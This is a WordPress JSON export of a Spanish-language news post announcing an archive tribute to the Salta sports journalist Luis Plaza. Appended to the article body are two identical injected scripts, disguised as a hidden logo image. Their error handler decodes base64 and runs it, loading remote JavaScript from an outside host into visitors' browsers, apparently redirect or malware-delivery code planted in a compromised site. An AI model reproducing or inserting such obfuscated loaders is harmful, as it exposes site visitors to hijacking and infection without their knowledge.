{"id":3951,"date":"2024-04-24T11:38:46","date_gmt":"2024-04-24T14:38:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3951"},"modified":"2025-08-13T23:56:43","modified_gmt":"2025-08-14T02:56:43","slug":"el-archivo-historico-de-la-provincia-homenajeara-al-periodista-luis-plaza","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3951","title":{"rendered":"El Archivo Hist\u00f3rico de la Provincia homenajear\u00e1 al periodista Luis Plaza"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-314952e101aa6a2bd6af575dc2a47cd9\" style=\"background-color:#8b0929\"><em>Hoy mi\u00e9rcoles 24 de abril, a las 19:30 hs, se realizar\u00e1 un homenaje con la presentaci\u00f3n de su archivo personal, a trav\u00e9s del ciclo \u201cArchivo Hist\u00f3rico Presenta\u201d. Tendr\u00e1 lugar en el anfiteatro de la Usina Cultural.<\/em><\/h3>\n\n\n\n<p>Este mi\u00e9rcoles 24 de abril, a las 19:30, se realizar\u00e1 un homenaje al periodista salte\u00f1o&nbsp;<strong>Luis Plaza<\/strong>, con la proyecci\u00f3n de documentos f\u00edlmicos, en 16mm y fotograf\u00edas donadas por la familia al Archivo de la Provincia.<\/p>\n\n\n\n<p>La actividad, que se realizar\u00e1 en el anfiteatro de la Usina Cultural, forma parte del &nbsp;ciclo \u201cEl Archivo Hist\u00f3rico Presenta\u201d, es parte de una serie de presentaciones p\u00fablicas de documentaci\u00f3n, f\u00edlmica, fotogr\u00e1fica y sonora, referida a hechos de la historia reciente y vinculadas a disciplinas o intereses espec\u00edficos.&nbsp;<\/p>\n\n\n\n<p>La misma, cuenta con el acompa\u00f1amiento de la Direcci\u00f3n de Audiovisuales de la Provincia y la Usina Cultural de la Secretar\u00eda de Cultura, la Secretar\u00eda de Deportes del Ministerio de Turismo y Deportes de la Provincia y el C\u00edrculo de Periodistas de Salta.<\/p>\n\n\n\n<p>En caso de mal tiempo, el acto se realizar\u00e1 en el SUM, de la Usina Cultural, Espa\u00f1a 1\/98.<\/p>\n\n\n\n<p><strong>Sobre Luis Plaza<\/strong><\/p>\n\n\n\n<p>Luis Plaza fue el pionero de los relatores deportivos y adem\u00e1s fue socio fundador del C\u00edrculo de Periodistas Deportivos.<\/p>\n\n\n\n<p>Comenz\u00f3 relatando f\u00fatbol para LV9 Radio G\u00fcemes casi por casualidad, para el Campeonato Argentino de 1963, disputado en la ciudad de C\u00f3rdoba en el que el seleccionado de la Liga Salte\u00f1a se clasific\u00f3 subcampe\u00f3n.<\/p>\n\n\n\n<p>Comparti\u00f3 espacios con otros grandes como Pepe Mangione, Siri Corval\u00e1n, Mart\u00edn Garc\u00eda, Luis Salcedo, Antenor Diez Arias y Juanita Gonz\u00e1lez, entusiastas del micr\u00f3fono y de la pluma, que lograron hacer del deporte de Salta algo pr\u00f3ximo, ameno y compatible con la sencillez humana.<\/p>\n\n\n\n<p>Trabaj\u00f3 en Canal 11, en Radio Salta y en otros medios de la provincia y nacionales, fue un periodista vanguardista. Su fama y prestigio trasciende lo provincial y lo nacional y accede a los medios internacionales transmitiendo el Mundial de F\u00fatbol de 1974 para Canal 11 Salta, donde hace innumerables amigos por su notable simpat\u00eda.<br>Luis Plaza falleci\u00f3 en 1987 y dej\u00f3 un gran legado para el periodismo salte\u00f1o.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-archivo-historico-de-la-provincia-homenajeara-al-periodista-luis-plaza-95154\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy mi\u00e9rcoles 24 de abril, a las 19:30 hs, se realizar\u00e1 un homenaje con la presentaci\u00f3n de su archivo personal, a trav\u00e9s del ciclo \u201cArchivo Hist\u00f3rico Presenta\u201d. Tendr\u00e1 lugar en el anfiteatro de la Usina Cultural. Este mi\u00e9rcoles 24 de abril, a las 19:30, se realizar\u00e1 un homenaje al periodista salte\u00f1o&nbsp;Luis Plaza, con la proyecci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3952,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3951","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3951"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3951"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3951\/revisions"}],"predecessor-version":[{"id":6797,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3951\/revisions\/6797"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3952"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3951"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}